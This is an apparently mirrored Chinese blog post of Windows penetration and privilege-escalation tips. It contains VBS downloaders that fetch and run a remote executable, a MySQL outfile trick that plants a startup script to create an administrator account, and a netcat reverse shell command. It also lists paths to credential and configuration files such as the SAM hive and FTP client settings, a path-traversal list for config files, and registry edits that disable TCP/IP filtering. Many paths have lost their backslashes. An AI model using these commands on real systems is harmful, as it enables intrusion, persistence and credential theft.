WINDOWS渗透与提权总结(2)

zoukankan html css js c++ java

WINDOWS渗透与提权总结(2)

vbs 下载者：

01 1：

02

03 echo Set sGet = createObject("ADODB.Stream") >>c:windowscftmon.vbs

04

05 echo sGet.Mode = 3 >>c:windowscftmon.vbs

06

07 echo sGet.Type = 1 >>c:windowscftmon.vbs

08

09 echo sGet.Open() >>c:windowscftmon.vbs

10

11 echo sGet.Write(xPost.responseBody) >>c:windowscftmon.vbs

12

13 echo sGet.SaveToFile "c:windowse.exe",2 >>c:windowscftmon.vbs

14

15 echo Set objShell = CreateObject("Wscript.Shell") >>c:windowscftmon.vbs

16

17 echo objshell.run """c:windowse.exe""" >>c:windowscftmon.vbs

18

19 cftmon.vbs

2：

01 On Error Resume Next:Dim iRemote,iLocal,s1,s2

02

03 iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))

04

05 s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"

06

07 Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()

08

09 Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()

10

11 sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

12

13 cscript c:down.vbs http://xxxx/mm.exe c:mm.exe

14 create table a (cmd text)：

1 insert into a values ("set wshshell=createobject (""wscript.shell"")");

2

3 insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");

4

5 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");

6

7 select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs";

Cmd 下目录的操作技巧：

列出d的所有目录：

1 for /d %i in (d:freehost*) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的显示出来：

1 for /d %i in (???) do @echo %i

以当前目录为搜索路径，把当前目录与下面的子目录的全部EXE文件列出：

1 for /r %i in (*.exe) do @echo %i

以指定目录为搜索路径，把当前目录与下面的子目录的所有文件列出：

1 for /r "f:freehosthmadesignweb" %i in (*.*) do @echo %i

这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中：

1 for /f %i in (c:1.txt) do echo %i

delims=后的空格是分隔符，tokens是取第几个位置：

1 for /f "tokens=2 delims= " %i in (a.txt) do echo %i

Windows 系统下的一些常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）：

001 c:windowsphp.ini

002

003 c:oot.ini

004

005 c:1.txt

006

007 c:a.txt

008

009 c:CMailServerconfig.ini

010

011 c:CMailServerCMailServer.exe

012

013 c:CMailServerWebMailindex.asp

014

015 c:program filesCMailServerCMailServer.exe

016

017 c:program filesCMailServerWebMailindex.asp

018

019 C:WinWebMailSysInfo.ini

020

021 C:WinWebMailWebdefault.asp

022

023 C:WINDOWSFreeHost32.dll

024

025 C:WINDOWS7i24iislog4.exe

026

027 C:WINDOWS7i24tool.exe

028

029 c:hzhostdatabasesurl.asp

030

031 c:hzhosthzclient.exe

032

033 C:Documents and SettingsAll Users「开始」菜单程序7i24虚拟主机管理平台自动设置[受控端].lnk

034

035 C:Documents and SettingsAll Users「开始」菜单程序Serv-UServ-U Administrator.lnk

036

037 C:WINDOWSweb.config

038

039 c:webindex.html

040

041 c:wwwindex.html

042

043 c:WWWROOTindex.html

044

045 c:websiteindex.html

046

047 c:webindex.asp

048

049 c:wwwindex.asp

050

051 c:wwwsiteindex.asp

052

053 c:WWWROOTindex.asp

054

055 c:webindex.php

056

057 c:wwwindex.php

058

059 c:WWWROOTindex.php

060

061 c:WWWsiteindex.php

062

063 c:webdefault.html

064

065 c:wwwdefault.html

066

067 c:WWWROOTdefault.html

068

069 c:websitedefault.html

070

071 c:webdefault.asp

072

073 c:wwwdefault.asp

074

075 c:wwwsitedefault.asp

076

077 c:WWWROOTdefault.asp

078

079 c:webdefault.php

080

081 c:wwwdefault.php

082

083 c:WWWROOTdefault.php

084

085 c:WWWsitedefault.php

086

087 C:Inetpubwwwrootpagerror.gif

088

089 c:windows otepad.exe

090

091 c:winnt otepad.exe

092

093 C:Program FilesMicrosoft OfficeOFFICE10winword.exe

094

095 C:Program FilesMicrosoft OfficeOFFICE11winword.exe

096

097 C:Program FilesMicrosoft OfficeOFFICE12winword.exe

098

099 C:Program FilesInternet ExplorerIEXPLORE.EXE

100

101 C:Program Fileswinrar ar.exe

102

103 C:Program Files360360Safe360safe.exe

104

105 C:Program Files360Safe360safe.exe

106

107 C:Documents and SettingsAdministratorApplication Data360Safe360Examine360Examine.log

108

109 c: avbinstore.ini

110

111 c: ising.ini

112

113 C:Program FilesRisingRavRsTask.xml

114

115 C:Documents and SettingsAll UsersStart Menudesktop.ini

116

117 C:Documents and SettingsAdministratorMy DocumentsDefault.rdp

118

119 C:Documents and SettingsAdministratorCookiesindex.dat

120

121 C:Documents and SettingsAdministratorMy Documents新建文本文档.txt

122

123 C:Documents and SettingsAdministrator桌面新建文本文档.txt

124

125 C:Documents and SettingsAdministratorMy Documents1.txt

126

127 C:Documents and SettingsAdministrator桌面1.txt

128

129 C:Documents and SettingsAdministratorMy Documentsa.txt

130

131 C:Documents and SettingsAdministrator桌面a.txt

132

133 C:Documents and SettingsAll UsersDocumentsMy PicturesSample PicturesBlue hills.jpg

134

135 E:Inetpubwwwrootaspnet_clientsystem_web1_1_4322SmartNav.htm

136

137 C:Program FilesRhinoSoft.comServ-UVersion.txt

138

139 C:Program FilesRhinoSoft.comServ-UServUDaemon.ini

140

141 C:Program FilesSymantecSYMEVENT.INF

142

143 C:Program FilesMicrosoft SQL Server80ToolsBinnsqlmangr.exe

144

145 C:Program FilesMicrosoft SQL ServerMSSQLDatamaster.mdf

146

147 C:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLDatamaster.mdf

148

149 C:Program FilesMicrosoft SQL ServerMSSQL.2MSSQLDatamaster.mdf

150

151 C:Program FilesMicrosoft SQL Server80ToolsHTMLdatabase.htm

152

153 C:Program FilesMicrosoft SQL ServerMSSQLREADME.TXT

154

155 C:Program FilesMicrosoft SQL Server90ToolsBinDdsShapes.dll

156

157 C:Program FilesMicrosoft SQL ServerMSSQLsqlsunin.ini

158

159 C:MySQLMySQL Server 5.0my.ini

160

161 C:Program FilesMySQLMySQL Server 5.0my.ini

162

163 C:Program FilesMySQLMySQL Server 5.0datamysqluser.frm

164

165 C:Program FilesMySQLMySQL Server 5.0COPYING

166

167 C:Program FilesMySQLMySQL Server 5.0sharemysql_fix_privilege_tables.sql

168

169 C:Program FilesMySQLMySQL Server 4.1inmysql.exe

170

171 c:MySQLMySQL Server 4.1inmysql.exe

172

173 c:MySQLMySQL Server 4.1datamysqluser.frm

174

175 C:Program FilesOracleoraconfigLpk.dll

176

177 C:WINDOWSMicrosoft.NETFrameworkv2.0.50727aspnet_state.exe

178

179 C:WINDOWSsystem32inetsrvw3wp.exe

180

181 C:WINDOWSsystem32inetsrvinetinfo.exe

182

183 C:WINDOWSsystem32inetsrvMetaBase.xml

184

185 C:WINDOWSsystem32inetsrviisa, dmpwdachg.asp

186

187 C:WINDOWSsystem32configdefault.LOG

188

189 C:WINDOWSsystem32configsam

190

191 C:WINDOWSsystem32configsystem

192

193 c:CMailServerconfig.ini

194

195 c:program filesCMailServerconfig.ini

196

197 c: omcat6 omcat6inversion.sh

198

199 c: omcat6inversion.sh

200

201 c: omcatinversion.sh

202

203 c:program files omcat6inversion.sh

204

205 C:Program FilesApache Software FoundationTomcat 6.0inversion.sh

206

207 c:Program FilesApache Software FoundationTomcat 6.0logsisapi_redirect.log

208

209 c:Apache2Apache2inApache.exe

210

211 c:Apache2inApache.exe

212

213 c:Apache2phplicense.txt

214

215 C:Program FilesApache GroupApache2inApache.exe

216

217 c:Program FilesQQ2007qq.exe

218

219 c:Program FilesTencent\, qqUser.db

220

221 c:Program FilesTencentqqqq.exe

222

223 c:Program FilesTencentqqinqq.exe

224

225 c:Program FilesTencentqq2009qq.exe

226

227 c:Program FilesTencentqq2008qq.exe

228

229 c:Program FilesTencentqq2010inqq.exe

230

231 c:Program FilesTencentqqUsersAll UsersRegistry.db

232

233 C:Program FilesTencentTMTMDllsQQZip.dll

234

235 c:Program FilesTencentTmBinTxplatform.exe

236

237 c:Program FilesTencentRTXServerAppConfig.xml

238

239 C:Program FilesFoxmalFoxmail.exe

240

241 C:Program FilesFoxmalaccounts.cfg

242

243 C:Program Files encentFoxmalFoxmail.exe

244

245 C:Program Files encentFoxmalaccounts.cfg

246

247 C:Program FilesLeapFTP 3.0LeapFTP.exe

248

249 C:Program FilesLeapFTPLeapFTP.exe

250

251 c:Program FilesGlobalSCAPECuteFTP Procftppro.exe

252

253 c:Program FilesGlobalSCAPECuteFTP Pro otes.txt

254

255 C:Program FilesFlashFXPFlashFXP.ini

256

257 C:Program FilesFlashFXPflashfxp.exe

258

259 c:Program FilesOraclein egsvr32.exe

260

261 c:Program Files腾讯游戏QQGAME eadme.txt

262

263 c:Program Files encent腾讯游戏QQGAME eadme.txt

264

265 c:Program Files encentQQGAME eadme.txt

266

267 C:Program FilesStormIIStorm.exe

各种网站的配置文件相对路径大全：

001 /config.php

002

003 ../../config.php

004

005 ../config.php

006

007 ../../../config.php

008

009 /config.inc.php

010

011 ./config.inc.php

012

013 ../../config.inc.php

014

015 ../config.inc.php

016

017 ../../../config.inc.php

018

019 /conn.php

020

021 ./conn.php

022

023 ../../conn.php

024

025 ../conn.php

026

027 ../../../conn.php

028

029 /conn.asp

030

031 ./conn.asp

032

033 ../../conn.asp

034

035 ../conn.asp

036

037 ../../../conn.asp

038

039 /config.inc.php

040

041 ./config.inc.php

042

043 ../../config.inc.php

044

045 ../config.inc.php

046

047 ../../../config.inc.php

048

049 /config/config.php

050

051 ../../config/config.php

052

053 ../config/config.php

054

055 ../../../config/config.php

056

057 /config/config.inc.php

058

059 ./config/config.inc.php

060

061 ../../config/config.inc.php

062

063 ../config/config.inc.php

064

065 ../../../config/config.inc.php

066

067 /config/conn.php

068

069 ./config/conn.php

070

071 ../../config/conn.php

072

073 ../config/conn.php

074

075 ../../../config/conn.php

076

077 /config/conn.asp

078

079 ./config/conn.asp

080

081 ../../config/conn.asp

082

083 ../config/conn.asp

084

085 ../../../config/conn.asp

086

087 /config/config.inc.php

088

089 ./config/config.inc.php

090

091 ../../config/config.inc.php

092

093 ../config/config.inc.php

094

095 ../../../config/config.inc.php

096

097 /data/config.php

098

099 ../../data/config.php

100

101 ../data/config.php

102

103 ../../../data/config.php

104

105 /data/config.inc.php

106

107 ./data/config.inc.php

108

109 ../../data/config.inc.php

110

111 ../data/config.inc.php

112

113 ../../../data/config.inc.php

114

115 /data/conn.php

116

117 ./data/conn.php

118

119 ../../data/conn.php

120

121 ../data/conn.php

122

123 ../../../data/conn.php

124

125 /data/conn.asp

126

127 ./data/conn.asp

128

129 ../../data/conn.asp

130

131 ../data/conn.asp

132

133 ../../../data/conn.asp

134

135 /data/config.inc.php

136

137 ./data/config.inc.php

138

139 ../../data/config.inc.php

140

141 ../data/config.inc.php

142

143 ../../../data/config.inc.php

144

145 /include/config.php

146

147 ../../include/config.php

148

149 ../include/config.php

150

151 ../../../include/config.php

152

153 /include/config.inc.php

154

155 ./include/config.inc.php

156

157 ../../include/config.inc.php

158

159 ../include/config.inc.php

160

161 ../../../include/config.inc.php

162

163 /include/conn.php

164

165 ./include/conn.php

166

167 ../../include/conn.php

168

169 ../include/conn.php

170

171 ../../../include/conn.php

172

173 /include/conn.asp

174

175 ./include/conn.asp

176

177 ../../include/conn.asp

178

179 ../include/conn.asp

180

181 ../../../include/conn.asp

182

183 /include/config.inc.php

184

185 ./include/config.inc.php

186

187 ../../include/config.inc.php

188

189 ../include/config.inc.php

190

191 ../../../include/config.inc.php

192

193 /inc/config.php

194

195 ../../inc/config.php

196

197 ../inc/config.php

198

199 ../../../inc/config.php

200

201 /inc/config.inc.php

202

203 ./inc/config.inc.php

204

205 ../../inc/config.inc.php

206

207 ../inc/config.inc.php

208

209 ../../../inc/config.inc.php

210

211 /inc/conn.php

212

213 ./inc/conn.php

214

215 ../../inc/conn.php

216

217 ../inc/conn.php

218

219 ../../../inc/conn.php

220

221 /inc/conn.asp

222

223 ./inc/conn.asp

224

225 ../../inc/conn.asp

226

227 ../inc/conn.asp

228

229 ../../../inc/conn.asp

230

231 /inc/config.inc.php

232

233 ./inc/config.inc.php

234

235 ../../inc/config.inc.php

236

237 ../inc/config.inc.php

238

239 ../../../inc/config.inc.php

240

241 /index.php

242

243 ./index.php

244

245 ../../index.php

246

247 ../index.php

248

249 ../../../index.php

250

251 /index.asp

252

253 ./index.asp

254

255 ../../index.asp

256

257 ../index.asp

258

259 ../../../index.asp

去除TCP IP筛选：

TCP/IP筛选在注册表里有三处，分别是：

1 HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip

2

3 HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

4

5 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

分别用以下命令来导出注册表项：

1 regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

2

3 regedit -e D:.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

4

5 regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

然后再把三个文件里的：

1 “EnableSecurityFilters"=dword:00000001”

改为：

1 “EnableSecurityFilters"=dword:00000000”

再将以上三个文件分别用以下命令导入注册表即可：

1 regedit -s D:a.reg

2

3 regedit -s D:.reg

4

5 regedit -s D:c.reg

Webshell 提权小技巧：

Cmd路径：

1 c:windows empcmd.exe

Nc 也在同目录下，例如反弹cmdshell：

1 "c:windows emp c.exe -vv ip 999 -e c:windows empcmd.exe"

通常都不会成功。

而直接在 cmd 路径上输入：

1 c:windows emp c.exe

命令输入：

1 -vv ip 999 -e c:windows empcmd.exe

却能成功。。这个不是重点

我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。

命令行调用 RAR 打包：

1 rar a -k -r -s -m3 c:1.rar c:folde

查看全文

相关阅读:
微服务常见安全认证方案Session token cookie跨域
 谈谈基于OAuth 2.0的第三方认证 [上篇]
Kerberos安全体系详解---Kerberos的简单实现
 kerberos认证原理---讲的非常细致，易懂
 重放攻击（Replay Attacks）
HTTP
Cookie/Session机制详解
 cookie和session的区别与联系
 基于Token的WEB后台认证机制
 如何用phpmyadmin导入大容量.sql文件，直接使用cmd命令进行导入

原文地址：https://www.cnblogs.com/milantgh/p/3601866.html